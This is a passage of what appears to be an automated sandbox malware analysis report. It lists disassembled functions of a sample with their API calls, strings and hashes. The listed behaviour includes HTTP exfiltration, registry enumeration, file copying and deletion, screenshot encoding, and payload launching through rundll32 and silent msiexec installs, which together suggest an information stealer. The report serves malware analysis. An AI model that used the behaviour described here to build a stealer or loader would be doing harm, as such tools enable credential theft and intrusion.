Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A

Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1CE
lstrcatA.KERNEL32(?,00000000,02D1DFD8,0042156C,02D1DFD8,00421568,00000000), ref: 0040D308
lstrcatA.KERNEL32(?,00421570), ref: 0040D317
lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
lstrcatA.KERNEL32(?,00421574), ref: 0040D339
lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
lstrcatA.KERNEL32(?,00000000), ref: 0040D390
lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D1E098,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(?), ref: 0040D42A
lstrlenA.KERNEL32(?), ref: 0040D439
memset.MSVCRT ref: 0040D488

Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F

DeleteFileA.KERNEL32(00000000), ref: 0040D4B4

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: f9656a23314f894d950e6970db3ce2ab5506ca71b40347e8cba58e24057aaade
Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
Opcode Fuzzy Hash: f9656a23314f894d950e6970db3ce2ab5506ca71b40347e8cba58e24057aaade
Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,02D27178), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,02D27038), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,02D27128,?,02D26910,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

", xrefs: 00404C42
------, xrefs: 00404A0D
", xrefs: 00404D83
------, xrefs: 00404CB9
------, xrefs: 00404B78

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: c5d2cc993c18a9a08297de5e6386308c362325c645dbfee98ccfb99804f2285a
Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
Opcode Fuzzy Hash: c5d2cc993c18a9a08297de5e6386308c362325c645dbfee98ccfb99804f2285a
Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,02D27178), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,02D26910,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

FUA, xrefs: 004062E0, 0040656D, 0040652E, 0040646C, 004062E3
ERROR, xrefs: 00406457
ERROR, xrefs: 00406519
GET, xrefs: 004063CC

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$FUA$GET
API String ID: 3074848878-1334267432
Opcode ID: 055a9930d14b7af2d2f3fa50f50c8283d223d12fb106c0e85b0539950209b0ee
Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
Opcode Fuzzy Hash: 055a9930d14b7af2d2f3fa50f50c8283d223d12fb106c0e85b0539950209b0ee
Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

RegOpenKeyExA.KERNEL32(00000000,02D234B8,00000000,00020019,00000000,004205BE), ref: 00418534
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Strings

?, xrefs: 0041850A
%s\%s, xrefs: 004185DD
- , xrefs: 00418733

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: e95e83b3cf14d9a7f79985eab913b6648984f0fe709cb853e8f7707615742390
Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
Opcode Fuzzy Hash: e95e83b3cf14d9a7f79985eab913b6648984f0fe709cb853e8f7707615742390
Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9

Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC

Strings

`dAF, xrefs: 00419361, 004193D9, 0041930E, 004192DF, 004192B2, 0041920D, 004191E4, 00419364
`dAF, xrefs: 004191CF, 00419399, 004191D2, 0041939C
image/jpeg, xrefs: 004192C6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `dAF$`dAF$image/jpeg
API String ID: 2244384528-2462684518
Opcode ID: 20763fd7fb18e24489e351647b60da2e81e68570f5e8f564048afc21aab537c2
Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
Opcode Fuzzy Hash: 20763fd7fb18e24489e351647b60da2e81e68570f5e8f564048afc21aab537c2
Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D1E098,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
Sleep.KERNEL32(0000EA60), ref: 00415C6B

Strings

ERROR, xrefs: 00415B82
ERROR, xrefs: 00415886
ERROR, xrefs: 00415A99
ERROR, xrefs: 00415C4E
ERROR, xrefs: 004158E3
ERROR, xrefs: 004159CD

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 8128acbffc139025f06e9cce0ea72cc093c25f0e075d3093012a768e01bcbf78
Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
Opcode Fuzzy Hash: 8128acbffc139025f06e9cce0ea72cc093c25f0e075d3093012a768e01bcbf78
Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411557
strtok_s.MSVCRT ref: 004119A0

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D1E098,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 3a2198042e5344188524ff1b47445696f6566e220c83fe797a7bbf74af7c672d
Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
Opcode Fuzzy Hash: 3a2198042e5344188524ff1b47445696f6566e220c83fe797a7bbf74af7c672d
Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95

Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00413415
ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
ShellExecuteEx.SHELL32(0000003C), ref: 0041373A

Strings

"" , xrefs: 004132EA
.dll, xrefs: 00413435
/passive, xrefs: 004136AB
.msi, xrefs: 004135E8
C:\Windows\system32\msiexec.exe, xrefs: 0041370F
C:\Windows\system32\rundll32.exe, xrefs: 00413582
<, xrefs: 004136E0
/i ", xrefs: 00413634

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 0dd7b640be8430b0b9b18faf9e760c87247a69dcd0f87d59539c1a69930f4c46
Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
Opcode Fuzzy Hash: 0dd7b640be8430b0b9b18faf9e760c87247a69dcd0f87d59539c1a69930f4c46
Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
